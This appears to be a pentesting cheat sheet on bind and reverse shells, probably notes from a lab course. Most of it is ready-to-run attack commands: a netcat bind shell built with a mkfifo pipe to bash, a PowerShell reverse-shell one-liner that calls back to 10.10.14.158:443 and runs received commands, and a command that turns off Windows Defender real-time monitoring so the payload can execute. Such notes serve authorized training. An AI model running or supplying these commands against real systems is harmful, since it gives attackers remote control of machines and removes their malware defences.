Shells & Payloads

Bind Shells

With a bind shell, the target system has a listener started and awaits a connection from a pentester's system (attack box).

Basic Bind Shell with Netcat

Server - Binding a Bash shell to the TCP session

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f

Client - Connecting to bind shell on target

nc -nv 10.129.41.200 7777

Reverse Shells

With a reverse shell, the attack box will have a listener running, and the target will need to initiate the connection.

Simple Reverse Shell in Windows

Server (attack box)

sudo nc -lvnp 443

Client (target)

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Windows Defender antivirus (AV) software stopped the execution of the code.

Disable AV

Set-MpPreference -DisableRealtimeMonitoring $true
To disable the antivirus through the Virus & threat protection settings or by using this command in an administrative PowerShell console. Once AV is disabled, attempt to execute the code again.

Last updated